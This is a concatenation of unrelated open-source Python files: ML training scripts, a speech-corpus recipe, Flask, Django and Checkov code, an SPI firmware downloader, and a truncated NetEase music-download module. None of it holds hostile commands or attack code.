    for i, (label, PPP_data) in enumerate(PPP_data_dict.iteritems()):
        if label == 'wild-type':
            ax.fill_between(PPP_data[:,0].flat, PPP_data[:,1].flat, PPP_data[:,2].flat,
                            facecolor='grey', alpha=0.1, linewidth=0)
        else:
            ax.fill_between(PPP_data[:,0].flat, PPP_data[:,1].flat, PPP_data[:,2].flat,
                            facecolor=colors[i], alpha=0.1, linewidth=0)
    ax.set_xlabel(r'Biomass production [h$^{-1}$]')
    ax.set_ylabel(r'%s flux [mmol g(DW)$^{-1}$ h$^{-1}$]' % reaction_id)
    ax.set_xlim(0, None)
    ax.set_ylim(0, None)
    ax.grid()
    # lower-envelope lines (wild-type drawn with lw=0: no visible line,
    # but it still contributes a legend entry)
    for i, (label, PPP_data) in enumerate(PPP_data_dict.iteritems()):
        if label == 'wild-type':
            ax.plot(PPP_data[:,0].flat, PPP_data[:,1].flat, lw=0, label=label)
        else:
            ax.plot(PPP_data[:,0].flat, PPP_data[:,1].flat, color=colors[i], lw=1, label=label)
    leg = ax.legend(loc='upper right', fancybox=True)
    leg.get_frame().set_alpha(0.7)
    # upper-envelope lines
    for i, (label, PPP_data) in enumerate(PPP_data_dict.iteritems()):
        if label == 'wild-type':
            ax.plot(PPP_data[:,0].flat, PPP_data[:,2].flat, lw=0, label=label)
        else:
            ax.plot(PPP_data[:,0].flat, PPP_data[:,2].flat, color=colors[i], lw=1, label=label)
| StarcoderdataPython |
66156 | """
Description taken from official website: https://datasets.kensho.com/datasets/spgispeech
SPGISpeech consists of 5,000 hours of recorded company earnings calls and their respective
transcriptions. The original calls were split into slices ranging from 5 to 15 seconds in
length to allow easy training for speech recognition systems. Calls represent a broad
cross-section of international business English; SPGISpeech contains approximately 50,000
speakers, one of the largest numbers of any speech corpus, and offers a variety of L1 and
L2 English accents. The format of each WAV file is single channel, 16kHz, 16 bit audio.
Transcription text represents the output of several stages of manual post-processing.
As such, the text contains polished English orthography following a detailed style guide,
including proper casing, punctuation, and denormalized non-standard words such as numbers
and acronyms, making SPGISpeech suited for training fully formatted end-to-end models.
Official reference:
<NAME>., <NAME>., <NAME>., <NAME>., <NAME>., <NAME>., Balam,
J., <NAME>., <NAME>., <NAME>., <NAME>., <NAME>., & <NAME>.
(2021). SPGISpeech: 5, 000 hours of transcribed financial audio for fully formatted
end-to-end speech recognition. ArXiv, abs/2104.02014.
ArXiv link: https://arxiv.org/abs/2104.02014
"""
import logging
import string
from pathlib import Path
from typing import Dict, Union
from tqdm.auto import tqdm
from lhotse.audio import Recording, RecordingSet
from lhotse.parallel import parallel_map
from lhotse.recipes.utils import manifests_exist, read_manifests_if_cached
from lhotse.supervision import SupervisionSet, SupervisionSegment
from lhotse.utils import Pathlike, Seconds
def download_spgispeech(
    target_dir: Pathlike = ".",
) -> None:
    """
    Placeholder downloader: SPGISpeech cannot be fetched automatically.

    The corpus is distributed behind a request form, so this function
    only logs instructions for obtaining it manually and returns.

    :param target_dir: Pathlike, accepted for API symmetry with other
        recipes but not used.
    """
    logging.info(
        "SPGISpeech is not available for direct download. Please fill out the form at"
        " https://datasets.kensho.com/datasets/spgispeech to download the corpus."
    )
def normalize(text: str) -> str:
    """Strip all ASCII punctuation from *text* and lower-case the result
    (text normalization similar to the ESPNet recipe)."""
    strip_punct = str.maketrans("", "", string.punctuation)
    return text.translate(strip_punct).lower()
def prepare_spgispeech(
    corpus_dir: Pathlike,
    output_dir: Pathlike,
    normalize_text: bool = True,
    num_jobs: int = 1,
) -> Dict[str, Dict[str, Union[RecordingSet, SupervisionSet]]]:
    """
    Returns the manifests which consist of the Recordings and Supervisions.
    When all the manifests are available in the ``output_dir``, it will simply read and return them.

    :param corpus_dir: Pathlike, the path of the data dir.
    :param output_dir: Pathlike, the path where to write the manifests.
    :param normalize_text: Bool, if True, normalize the text (similar to ESPNet recipe).
    :param num_jobs: int, the number of jobs to use for parallel processing.
    :return: a Dict whose key is the dataset part, and the value is Dicts with the keys 'audio' and 'supervisions'.

    .. note::
        Unlike other recipes, output_dir is not Optional here because we write the manifests
        to the output directory while processing to avoid OOM issues, since it is a large dataset.

    .. caution::
        The `normalize_text` option removes all punctuation and converts all upper case to lower case.
        This includes removing possibly important punctuations such as dashes and apostrophes.
    """
    corpus_dir = Path(corpus_dir)
    assert corpus_dir.is_dir(), f"No such directory: {corpus_dir}"
    # Support both layouts: <corpus>/train/... and <corpus>/spgispeech/train/...
    audio_dir = (
        corpus_dir if (corpus_dir / "train").is_dir() else corpus_dir / "spgispeech"
    )
    dataset_parts = ["train", "val"]
    manifests = {}
    output_dir = Path(output_dir)
    output_dir.mkdir(parents=True, exist_ok=True)
    # Maybe the manifests already exist: we can read them and save a bit of preparation time.
    manifests = read_manifests_if_cached(
        dataset_parts=dataset_parts,
        output_dir=output_dir,
        prefix="spgispeech",
        suffix="jsonl.gz",
        lazy=True,
    )
    for part in dataset_parts:
        logging.info(f"Processing SPGISpeech subset: {part}")
        if manifests_exist(
            part=part, output_dir=output_dir, prefix="spgispeech", suffix="jsonl.gz"
        ):
            logging.info(f"SPGISpeech subset: {part} already prepared - skipping.")
            continue
        # Read the recordings and write them into manifest. We additionally store the
        # duration of the recordings in a dict which will be used later to create the
        # supervisions.
        global audio_read_worker
        durations = {}
        # NOTE(review): audio_read_worker mutates the enclosing `durations`
        # dict; this only works if parallel_map runs the workers in a way
        # that shares this dict with the parent -- confirm before raising
        # num_jobs with a process-based executor.
        def audio_read_worker(p: Path) -> Recording:
            r = Recording.from_file(p, recording_id=f"{p.parent.stem}_{p.stem}")
            durations[r.id] = r.duration
            return r
        with RecordingSet.open_writer(
            output_dir / f"spgispeech_recordings_{part}.jsonl.gz"
        ) as rec_writer:
            for recording in tqdm(
                parallel_map(
                    audio_read_worker,
                    (audio_dir / part).rglob("*.wav"),
                    num_jobs=num_jobs,
                ),
                desc="Processing SPGISpeech recordings",
            ):
                rec_writer.write(recording)
        # Read supervisions and write them to manifest
        with SupervisionSet.open_writer(
            output_dir / f"spgispeech_supervisions_{part}.jsonl.gz"
        ) as sup_writer, open(corpus_dir / f"{part}.csv", "r") as f:
            # Skip the header
            next(f)
            for line in tqdm(f, desc="Processing utterances"):
                parts = line.strip().split("|")
                # 07a785e9237c389c1354bb60abca42d5/1.wav -> 07a785e9237c389c1354bb60abca42d5_1
                recording_id = parts[0].replace("/", "_").replace(".wav", "")
                text = parts[2]
                if normalize_text:
                    text = normalize(text)
                # the speaker id is the leading hash of the recording id
                spkid = recording_id.split("_")[0]
                segment = SupervisionSegment(
                    id=recording_id,
                    recording_id=recording_id,
                    text=text,
                    speaker=spkid,
                    start=0,
                    duration=durations[recording_id],
                    language="English",
                )
                sup_writer.write(segment)
        manifests[part] = {
            "recordings": RecordingSet.from_jsonl_lazy(rec_writer.path),
            "supervisions": SupervisionSet.from_jsonl_lazy(sup_writer.path),
        }
    return manifests
| StarcoderdataPython |
389989 | # TensorFlow and tf.keras
import tensorflow as tf
# Helper libraries
import numpy as np
import matplotlib.pyplot as plt
from PIL import Image, ImageOps
# Load the Fashion-MNIST dataset (60k train / 10k test 28x28 greyscale images).
fashion_mnist = tf.keras.datasets.fashion_mnist
(train_images, train_labels), (test_images,
                               test_labels) = fashion_mnist.load_data()
# Human-readable names for the 10 integer class labels.
class_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat',
               'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']
# print(train_images.shape)
# print(len(train_labels))
# print(train_labels)
# print(test_images.shape)
# print(len(test_labels))
# plt.figure()
# plt.imshow(train_images[0])
# plt.colorbar()
# plt.grid(False)
# plt.savefig("preprocess.png")
# Scale pixel values from [0, 255] down to [0, 1] before training.
train_images = train_images / 255.0
test_images = test_images / 255.0
#plt.figure(figsize=(10, 10))
# for i in range(25):
#     plt.subplot(5, 5, i+1)
#     plt.xticks([])
#     plt.yticks([])
#     plt.grid(False)
#     plt.imshow(train_images[i], cmap=plt.cm.binary)
#     plt.xlabel(class_names[train_labels[i]])
# plt.savefig("25.png")
# Set up the model: flatten 28x28 -> 784, one 128-unit ReLU layer, 10 logits.
model = tf.keras.Sequential([
    tf.keras.layers.Flatten(input_shape=(28, 28)),
    tf.keras.layers.Dense(128, activation='relu'),
    tf.keras.layers.Dense(10)
])
# Compile the model (loss works on raw logits, hence from_logits=True)
model.compile(optimizer='adam',
              loss=tf.keras.losses.SparseCategoricalCrossentropy(
                  from_logits=True),
              metrics=['accuracy'])
# Train the model
model.fit(train_images, train_labels, epochs=10)
# Evaluate accuracy on the held-out test set
test_loss, test_acc = model.evaluate(test_images, test_labels, verbose=2)
print('\nTest accuracy:', test_acc)
# Make predictions: append a softmax layer to turn logits into probabilities
probability_model = tf.keras.Sequential([model,
                                         tf.keras.layers.Softmax()])
predictions = probability_model.predict(test_images)
#############################################################################
def plot_image(i, predictions_array, true_label, img):
    """Draw test image *i* with a caption showing the predicted class, its
    confidence and the true class — blue when correct, red when wrong."""
    true_label, img = true_label[i], img[i]
    plt.grid(False)
    plt.xticks([])
    plt.yticks([])
    plt.imshow(img, cmap=plt.cm.binary)

    predicted_label = np.argmax(predictions_array)
    color = 'blue' if predicted_label == true_label else 'red'
    caption = "{} {:2.0f}% ({})".format(class_names[predicted_label],
                                        100*np.max(predictions_array),
                                        class_names[true_label])
    plt.xlabel(caption, color=color)
def plot_value_array(i, predictions_array, true_label):
    """Bar chart of the 10 class probabilities for sample *i*: the
    predicted class bar is red and the true class bar blue (blue wins
    when prediction and truth coincide)."""
    true_label = true_label[i]
    plt.grid(False)
    plt.xticks(range(10))
    plt.yticks([])
    bars = plt.bar(range(10), predictions_array, color="#777777")
    plt.ylim([0, 1])
    # colour the predicted bar first so a correct prediction ends up blue
    bars[np.argmax(predictions_array)].set_color('red')
    bars[true_label].set_color('blue')
# print(test_images[0:5])
# print(test_labels[0:5])
# print("------------")
# Load a hand-made test image and scale it like the training data.
# NOTE(review): assumes ./3a.png is 28x28 greyscale -- confirm; other
# shapes/modes would not match the model's input layer.
myImg = Image.open("./3a.png")
np1Img = np.array(myImg) / 255
npMyImg = np.array([np1Img])  # add a batch dimension of size 1
# print(npMyImg)
# print(np.array([0]))
# print(npMyImg)
# test_loss, test_acc = model.evaluate(
#     npMyImg, np.array([0]), verbose=2)
# Make predictions: softmax head turns the model's logits into probabilities
probability_model = tf.keras.Sequential([model,
                                         tf.keras.layers.Softmax()])
test_my_image = probability_model.predict(npMyImg)
print(test_my_image)
print(np.argmax(test_my_image))
print(class_names[np.argmax(test_my_image)])
def plot_x_images():
    """Plot a 5x3 grid of test images starting at index 9000 and save it.

    Each image is shown next to its class-probability bar chart; the
    figure is written to plottedImages9000.png.
    """
    num_rows = 5
    num_cols = 3
    num_images = num_rows * num_cols
    plt.figure(figsize=(2 * 2 * num_cols, 2 * num_rows))
    for i in range(num_images):
        idx = 9000 + i
        plt.subplot(num_rows, 2 * num_cols, 2 * i + 1)
        # BUG FIX: the original passed index 9000+i for the image/label but
        # predictions[i] (index i) for the prediction, pairing image 9000+i
        # with the prediction for image i. Use the same index for both.
        plot_image(idx, predictions[idx], test_labels, test_images)
        plt.subplot(num_rows, 2 * num_cols, 2 * i + 2)
        plot_value_array(idx, predictions[idx], test_labels)
    plt.tight_layout()
    plt.savefig("plottedImages9000.png")
# plot_x_images()
| StarcoderdataPython |
6605343 | import pytest
import socket
from app import *
@pytest.fixture
def client():
    """Flask test client for the application under test."""
    return app.test_client()
def test_root(client):
    """The /hello/<name> route echoes the name and the serving hostname."""
    res = client.get('/hello/Juan')
    body = str(res.data)
    # IDIOM FIX: split the compound `and` assertion into two asserts so a
    # failure pinpoints which expectation broke.
    assert 'Juan' in body
    assert str(socket.gethostname()) in body
| StarcoderdataPython |
1996927 | from typing import Any
from checkov.common.models.enums import CheckCategories, CheckResult
from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck
class RejectUnsignedCommits(BaseResourceValueCheck):
    """Checkov policy CKV_GLB_4: GitLab projects must reject unsigned commits."""

    def __init__(self) -> None:
        super().__init__(
            name="Ensure commits are signed",
            id="CKV_GLB_4",
            categories=[CheckCategories.GENERAL_SECURITY],
            supported_resources=["gitlab_project"],
            missing_block_result=CheckResult.FAILED,
        )

    def get_inspected_key(self) -> str:
        """Attribute path this policy inspects on the resource."""
        return "push_rules/[0]/reject_unsigned_commits"

    def get_expected_value(self) -> Any:
        """The flag must be True for the check to pass."""
        return True


check = RejectUnsignedCommits()
| StarcoderdataPython |
6619067 | <reponame>TauOmicronMu/Y13Computing<gh_stars>0
# -*- coding: utf-8 -*-
#DeductExpenditureScreenStringsGerman
# UI strings for the "Deduct Expenditure" screen (German locale).
# English translations are given alongside each string.
DEDUCT_EXPENDITURE_HELP_TEXT = u"Hier können Sie die Ausgaben bei den Gesamtausgaben abziehen."  # "Here you can deduct the expenses from the total expenditure."
ENTER_ADMIN_PASS_TEXT = u"Administrator-Kennwort: "  # "Administrator password: "
EXPENDITURE_ONE_TEXT = u"Geben Sie Ausgaben abziehen: "  # "Enter expenditure to deduct: "
EXPENDITURE_TWO_TEXT = u"Geben Sie Ausgaben: "  # "Enter expenditure: "
SUBMIT_BUTTON_TEXT = u"Senden"  # "Send"
| StarcoderdataPython |
1893887 | from flask import Flask
from flask_cors import CORS
def create_app():
    """Application factory: build the Flask app with CORS and MQTT wired up.

    Returns:
        The configured :class:`flask.Flask` instance.
    """
    try:
        app = Flask(__name__, instance_relative_config=True)
        CORS(app)

        # Local import so the MQTT client is only initialised when the
        # factory actually runs.
        from .common.mqtt_client import init_mqtt
        init_mqtt()

        @app.route("/")
        def home():
            return "<h1>Welcome to flask mqtt integration service<h1>"

        return app
    except Exception:
        # BUG FIX: the original `raise e` re-bound the exception and lost
        # part of the original traceback context; a bare `raise` re-raises
        # with the full traceback intact.
        raise
| StarcoderdataPython |
1630020 | <gh_stars>0
from django.contrib import admin
from django.core import exceptions
from django.forms import BaseInlineFormSet
from django.forms.models import ModelForm
from django.utils.translation import gettext_lazy as _
from ordered_model.admin import (
OrderedInlineModelAdminMixin,
OrderedModelAdmin,
OrderedStackedInline,
)
from sponsors.models import SponsorLevel
from .models import (
AudienceLevel,
Conference,
Deadline,
Duration,
Keynote,
KeynoteSpeaker,
Topic,
)
def validate_deadlines_form(forms):
    """Cross-validate a set of Deadline inline forms.

    Ensures each deadline's start precedes its end and that at most one
    deadline exists for every non-custom type (rows marked for deletion
    are ignored).
    """
    existing_types = set()
    for form in forms:
        if not form.cleaned_data:
            # NOTE(review): this aborts validation of *all* remaining forms
            # as soon as one empty form is seen; `continue` may have been
            # the intent -- confirm against the formset's expected behaviour.
            return
        start = form.cleaned_data["start"]
        end = form.cleaned_data["end"]
        delete = form.cleaned_data["DELETE"]
        if start > end:
            raise exceptions.ValidationError(_("Start date cannot be after end"))
        type = form.cleaned_data["type"]
        # Custom deadlines may repeat; deleted rows never count.
        if type == Deadline.TYPES.custom or delete:
            continue
        if type in existing_types:
            raise exceptions.ValidationError(
                _("You can only have one deadline of type %(type)s") % {"type": type}
            )
        existing_types.add(type)
class DeadlineForm(ModelForm):
    """ModelForm for Deadline; cross-row validation lives in DeadlineFormSet."""

    class Meta:
        model = Deadline
        fields = ["start", "end", "name", "description", "type", "conference"]
class DeadlineFormSet(BaseInlineFormSet):
    """Inline formset that validates all deadline rows together."""

    def clean(self):
        validate_deadlines_form(self.forms)
class DeadlineInline(admin.TabularInline):
    """Tabular inline for editing a conference's deadlines."""

    model = Deadline
    form = DeadlineForm
    formset = DeadlineFormSet
class DurationInline(admin.StackedInline):
    """Stacked inline for talk durations; submission types use the dual-pane picker."""

    model = Duration
    filter_horizontal = ("allowed_submission_types",)
class SponsorLevelInline(admin.TabularInline):
    """Tabular inline for the conference's sponsor levels."""

    model = SponsorLevel
@admin.register(Conference)
class ConferenceAdmin(admin.ModelAdmin):
    """Admin for Conference, grouping fields into themed fieldsets."""

    readonly_fields = ("created", "modified")
    # Many-to-many fields get the two-pane selector widget.
    filter_horizontal = ("topics", "languages", "audience_levels", "submission_types")
    fieldsets = (
        (
            "Details",
            {
                "fields": (
                    "name",
                    "code",
                    "introduction",
                    "timezone",
                    "latitude",
                    "longitude",
                    "map_link",
                )
            },
        ),
        (
            # Pretix ticketing integration identifiers.
            "Pretix",
            {"fields": ("pretix_organizer_id", "pretix_event_id", "pretix_event_url")},
        ),
        (
            # Pretix question/ticket ids used for hotel bookings.
            "Hotel",
            {
                "fields": (
                    "pretix_hotel_ticket_id",
                    "pretix_hotel_room_type_question_id",
                    "pretix_hotel_checkin_question_id",
                    "pretix_hotel_checkout_question_id",
                )
            },
        ),
        (
            "Conference",
            {
                "fields": (
                    ("start", "end"),
                    "submission_types",
                    "topics",
                    "audience_levels",
                    "languages",
                )
            },
        ),
    )
    inlines = [DeadlineInline, DurationInline, SponsorLevelInline]
@admin.register(Topic)
class TopicAdmin(admin.ModelAdmin):
    """Default admin for Topic; no customisation needed."""
    pass
@admin.register(AudienceLevel)
class AudienceLevelAdmin(admin.ModelAdmin):
    """Default admin for AudienceLevel; no customisation needed."""
    pass
@admin.register(Deadline)
class DeadlineAdmin(admin.ModelAdmin):
    """Admin for standalone Deadline editing, split into info and date groups."""

    fieldsets = (
        ("Info", {"fields": ("name", "description", "type", "conference")}),
        ("Dates", {"fields": ("start", "end")}),
    )
class KeynoteSpeakerInline(OrderedStackedInline):
    """Inline editor for a keynote's speakers, orderable via ordered_model."""

    model = KeynoteSpeaker
    fields = (
        "keynote",
        "name",
        "photo",
        "bio",
        "pronouns",
        "highlight_color",
        "twitter_handle",
        "instagram_handle",
        "website",
        "order",
        "move_up_down_links",
    )
    # Ordering widgets are rendered but not directly editable.
    readonly_fields = (
        "order",
        "move_up_down_links",
    )
    # BUG FIX: `extra = 1` was declared twice (once before `fields`, once
    # after `readonly_fields`); keep a single declaration.
    extra = 1
    ordering = ("order",)
@admin.register(Keynote)
class KeynoteAdmin(OrderedInlineModelAdminMixin, OrderedModelAdmin):
    """Admin for Keynote with orderable speaker inlines."""

    list_display = (
        "title",
        "conference",
        "move_up_down_links",
    )
    list_filter = ("conference",)
    fieldsets = (
        (
            _("Keynote"),
            {
                "fields": (
                    "conference",
                    "slug",
                    "title",
                    "description",
                    "topic",
                )
            },
        ),
    )
    inlines = [
        KeynoteSpeakerInline,
    ]
| StarcoderdataPython |
import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
from KNN_Class import K_NN

# Load the iris dataset (the CSV has no header row).
df = pd.read_csv("iris.csv", header=None)
# Identify our features (first four columns) and target (column 4).
x = np.array(df.drop(columns=[4]))
y = np.array(df[4])
# Create a train and test dataset (fixed seed for reproducibility).
X_train, X_test, y_train, y_test = train_test_split(x, y, test_size=0.33, random_state=42)
# Instantiate our hand-written class object with k=3.
model = K_NN(K=3)
# Fit our data onto the model.
model.fit(X_train, y_train)
# Create our prediction.
y_pred = model.predict(X_test)
# Print out the result of our prediction.
print(f"By hand accuracy: {accuracy_score(y_test, y_pred)}")

# Using the sklearn KNN class as a reference implementation.
from sklearn.neighbors import KNeighborsClassifier
# Instantiate the sklearn KNN class with the same k.
neigh = KNeighborsClassifier(n_neighbors=3)
# Fit the data onto the model.
neigh.fit(X_train, y_train)
# Create the prediction.
sklearn_pred = neigh.predict(X_test)
# Print out the accuracy of the predictions compared to the actual labels.
print(f"Sklearn model accuracy: {accuracy_score(y_test, sklearn_pred)}")
21513 | <gh_stars>0
# Demonstration of common str methods and slicing on a sample name.
name = " alberT"

one = name.rsplit()            # whitespace split -> ['alberT']
print(f"one: {one}")

two = name.index('al', 0)      # first occurrence of 'al'
print(f"two: {two}")

three = name.index('T', -1)    # search starting from the last character
print(f"three: {three}")

four = name.replace('l', 'p')
print(f"four: {four}")

five = name.split('l')
print(f"five: {five}")

six = name.upper()
print(f"six: {six}")

seven = name.lower()
print(f"seven: {seven}")

eight = name[1]                # single-character indexing
print(f"eight: {eight}")

nine = name[:3]                # prefix slice
print(f"nine: {nine}")

ten = name[-2:]                # suffix slice
print(f"ten: {ten}")

eleven = name.index("e")
print(f"eleven: {eleven}")

twelve = name[:-1]             # drop the last character
print(f"twelve: {twelve}")
1807453 | <gh_stars>1000+
from torchvision import transforms
from ts.torch_handler.image_classifier import ImageClassifier
class MNISTDigitClassifier(ImageClassifier):
    """TorchServe handler that returns the digit contained in an MNIST image.

    Extends the default ImageClassifier handler; only postprocess() is
    customised so the response is the predicted digit index rather than
    raw logits. Everything else is reused from the parent class.
    """

    # Standard MNIST normalisation constants (mean, std).
    image_processing = transforms.Compose([
        transforms.ToTensor(),
        transforms.Normalize((0.1307,), (0.3081,)),
    ])

    def postprocess(self, data):
        """Map a batch of logits to a list of predicted digit indices."""
        predicted = data.argmax(dim=1)
        return predicted.tolist()
| StarcoderdataPython |
12857197 | #!/usr/bin/python
import sys, getopt, os, time, array
from pyftdi.spi import SpiController
def download ( filename, speed=5000000, chunksize=32 ):
    """Stream *filename* over SPI (FTDI FT2232H, interface 2, CS0) in chunks.

    Returns a (bytes_sent, seconds_elapsed) tuple on success; exits the
    process with status 1 on any error.  (Python 2 code.)
    """
    try:
        with open(filename, 'rb') as filein:
            data = filein.read ()
        data = array.array('B', data).tolist()
    except IOError:
        print "ERROR: Could not open file {0}".format(os.path.basename(filename))
        exit (1)
    try:
        spi = SpiController(silent_clock=True)
        # 0x0403/0x6010 is the FTDI FT2232H; use its second MPSSE interface.
        spi.configure(vendor=0x0403, product=0x6010, interface=2)
        spi2mars = spi.get_port(cs=0)
        spi2mars.set_frequency(speed)
        time.sleep(1)
        startTime = time.time()
        i = 0
        length = len(data)
        # Send all full chunks, then the remainder in one final exchange.
        while length > chunksize:
            spi2mars.exchange(data[i:i+chunksize])
            i += chunksize
            length -= chunksize
        spi2mars.exchange(data[i:])
        stopTime = time.time()
        print "File {0} dumped on SPI @{1}MHz ({2}bytes in {3} seconds)".format(os.path.basename(filename), speed/1.0e6, len(data), stopTime - startTime)
        return (len(data), stopTime-startTime)
    except Exception, e :
        print "ERROR: SPI Write -", e
        exit (1)
def main (argv):
print "SAF5100 SPI downloader"
try:
opts, args = getopt.getopt(argv, "hf:",["--firmware="])
except:
print "spi_host_write.py -f <firmware>"
sys.exit(2)
fname="/lib/firmware/cohda/SDRMK5Dual.bin".format(os.path.dirname(sys.argv[0]))
for opt, arg in opts:
if opt=="-h":
print "spi_host_write.py -f <firmware>"
elif opt=="-f":
fname = arg
print "Downloading {0}".format(fname)
download (fname)
if __name__ == "__main__":
main (sys.argv[1:])
| StarcoderdataPython |
8140838 | <filename>zhuaxia/netease.py
# -*- coding:utf-8 -*-
import time
import re
import requests
import log, config, util
import json
import md5
import os
from os import path
import downloader
from obj import Song, Handler
if config.LANG.upper() == 'CN':
import i18n.msg_cn as msg
else:
import i18n.msg_en as msg
LOG = log.get_logger("zxLogger")
#163 music api url
url_163="http://music.163.com"
#url_mp3="http://m1.music.126.net/%s/%s.mp3" #not valid any longer
url_album="http://music.163.com/api/album/%s/"
url_song="http://music.163.com/api/song/detail/?id=%s&ids=[%s]"
url_playlist="http://music.163.com/api/playlist/detail?id=%s"
url_artist_top_song = "http://music.163.com/api/artist/%s"
url_lyric = "http://music.163.com/api/song/lyric?id=%s&lv=1"
url_mp3_post = 'http://music.163.com/weapi/song/enhance/player/url?csrf_token='
#agent string for http request header
AGENT= 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36'
#this block is kind of magical secret.....No idea why the keys, modulus have those values ( for building the post request parameters. The encryption logic was take from https://github.com/Catofes/musicbox/blob/new_api/NEMbox/api.py)
modulus = '00e0b509f6259df8642dbc35662901477df22677ec152b5ff68ace615bb7b725152b3ab17a876aea8a5aa76d2e417629ec4ee341f56135fccf695280104e0312ecbda92557c93870114af6c9d05c4f7f0c3685b7a46bee255932575cce10b424d813cfe4875d3e82047b97ddef52741d546b8e289dc6935b3ece0462db0a22b8e7'
nonce = '0CoJUm6Qyw8W8jud'
pubKey = '010001'
class NeteaseSong(Song):
    """
    163 Song class. If song_json was given, Song.post_set() needs to be
    called afterwards for post-setting abs_path, filename, etc.
    url example: http://music.163.com/song?id=209235
    """
    def __init__(self,m163,url=None, song_json=None):
        """Build either from a song page *url* or from a ready *song_json* dict."""
        Song.__init__(self)
        self.song_type=2
        self.handler = m163
        # self.group_dir = None
        # self.lyric_text = ''
        if url:
            self.url = url
            # The numeric song id is embedded in the url query string.
            self.song_id = re.search(r'(?<=/song\?id=)\d+', url).group(0)
            LOG.debug(msg.head_163 + msg.fmt_init_song % self.song_id)
            response = self.handler.read_link(url_song % (self.song_id,self.song_id))
            #print json for debug
            #LOG.debug(util.format_json(response.text))
            j = response.json()['songs'][0]
            self.init_by_json(j)
            LOG.debug(msg.head_163 + msg.fmt_init_song_ok % self.song_id)
            #set filename, abs_path etc.
            self.post_set()
        elif song_json:
            self.init_by_json(song_json)

    def init_by_json(self,js):
        """Populate song fields from a 163 API song JSON object."""
        #song_id
        self.song_id = js['id']
        #name
        self.song_name = util.decode_html(js['name'])
        LOG.debug("parsing song %s ...."%self.song_name)
        # artist_name (first credited artist only)
        self.artist_name = js['artists'][0]['name']
        # album id, name
        self.album_name = util.decode_html(js['album']['name'])
        self.album_id = js['album']['id']
        #track no -- key name differs between API endpoints
        if 'position' in js and js['position']:
            self.track_no = js['position']
        elif 'no' in js and js['no']:
            self.track_no = js['no']
        # Download link: prefer high quality when requested, falling back
        # through medium to low quality.
        # NOTE(review): `quality` is assigned below but never used.
        dfsId = ''
        bitrate = 0
        if self.handler.is_hq and js['hMusic']:
            dfsId = js['hMusic']['dfsId']
            quality = 'HD'
            bitrate = js['hMusic']['bitrate']
        elif js['mMusic']:
            dfsId = js['mMusic']['dfsId']
            quality = 'MD'
            bitrate = js['mMusic']['bitrate']
        elif js['lMusic']:
            LOG.warning(msg.head_163 + msg.fmt_quality_fallback %self.song_name)
            dfsId = js['lMusic']['dfsId']
            quality = 'LD'
            bitrate = js['lMusic']['bitrate']
        if dfsId:
            # self.dl_link = url_mp3 % (self.handler.encrypt_dfsId(dfsId), dfsId)
            self.dl_link = self.handler.get_mp3_dl_link(self.song_id, bitrate)
        else:
            LOG.warning(msg.head_163 + msg.fmt_err_song_parse %self.song_name)
        #used only for album/collection etc. create a dir to group all songs
        #if it is needed, it should be set by the caller
        self.group_dir = None
class NeteaseAlbum(object):
    """The netease album object: fetches album metadata and all its songs."""
    def __init__(self, m163, url):
        """url example: http://music.163.com/album?id=2646379"""
        self.handler=m163
        self.url = url
        self.album_id = re.search(r'(?<=/album\?id=)\d+', self.url).group(0)
        LOG.debug(msg.head_163 + msg.fmt_init_album % self.album_id)
        self.year = None
        self.track=None
        self.songs = [] # list of Song
        self.init_album()

    def init_album(self):
        """Fetch album metadata, build NeteaseSong children and grab cover art."""
        #album json
        js = self.handler.read_link(url_album % self.album_id).json()['album']
        #name
        self.album_name = util.decode_html(js['name'])
        #album logo
        self.logo = js['picUrl']
        # artist_name
        self.artist_name = js['artists'][0]['name']
        #handle songs
        for jsong in js['songs']:
            song = NeteaseSong(self.handler, song_json=jsong)
            # Group all album tracks under "<artist>_<album>".
            song.group_dir = self.artist_name + u'_' + self.album_name
            song.post_set()
            self.songs.append(song)
        # NOTE(review): assumes the album has at least one song;
        # self.songs[-1] raises IndexError on an empty album.
        d = path.dirname(self.songs[-1].abs_path)
        #creating the dir
        LOG.debug(msg.head_163 + msg.fmt_create_album_dir % d)
        util.create_dir(d)
        #download album logo images
        LOG.debug(msg.head_163 + msg.fmt_dl_album_cover % self.album_name)
        downloader.download_url(self.logo, path.join(d,'cover.' +self.logo.split('.')[-1]))
class NeteasePlayList(object):
    """The netease playlist object: fetches a playlist and its tracks."""
    def __init__(self, m163, url):
        self.url = url
        self.handler = m163
        # The playlist id embedded in the url query string.
        self.playlist_id = re.search(r'(?<=/playlist\?id=)\d+', self.url).group(0)
        self.songs = []
        self.init_playlist()

    def init_playlist(self):
        """Fetch the playlist JSON and build one NeteaseSong per track."""
        j = self.handler.read_link(url_playlist % (self.playlist_id) ).json()['result']
        self.playlist_name = j['name']
        for jsong in j['tracks']:
            song = NeteaseSong(self.handler, song_json=jsong)
            # Group the files under a directory named after the playlist.
            song.group_dir = self.playlist_name
            song.post_set()
            self.songs.append(song)
        if len(self.songs):
            #creating the dir
            util.create_dir(path.dirname(self.songs[-1].abs_path))
class NeteaseTopSong(object):
    """Download top (hot) songs of a given artist."""
    def __init__(self, m163, url):
        self.url = url
        self.handler = m163
        #artist id embedded in the url
        self.artist_id = re.search(r'(?<=/artist\?id=)\d+', self.url).group(0)
        self.artist_name = ""
        self.songs = []
        self.init_topsong()

    def init_topsong(self):
        """Fetch the artist's hot songs, honouring config.DOWNLOAD_TOP_SONG as a cap."""
        j = self.handler.read_link(url_artist_top_song % (self.artist_id)).json()
        self.artist_name = j['artist']['name']
        for jsong in j['hotSongs']:
            song = NeteaseSong(self.handler, song_json=jsong)
            song.group_dir = self.artist_name + '_TopSongs'
            song.post_set()
            self.songs.append(song)
            #check config for top X: stop once the configured cap is reached
            if config.DOWNLOAD_TOP_SONG>0 and len(self.songs) >= config.DOWNLOAD_TOP_SONG:
                break
        if len(self.songs):
            #creating the dir
            util.create_dir(path.dirname(self.songs[-1].abs_path))
class Netease(Handler):
    """
    netease handler object.
    `option` carries the user-given options and other data; @see __init__.
    """
    def __init__(self, option):
        Handler.__init__(self,option.proxy_pool)
        self.is_hq = option.is_hq
        self.dl_lyric = option.dl_lyric
        self.proxy = option.proxy
        #headers sent with every request; the Referer/Cookie are required
        #by the 163 API.
        self.HEADERS = {'User-Agent':AGENT}
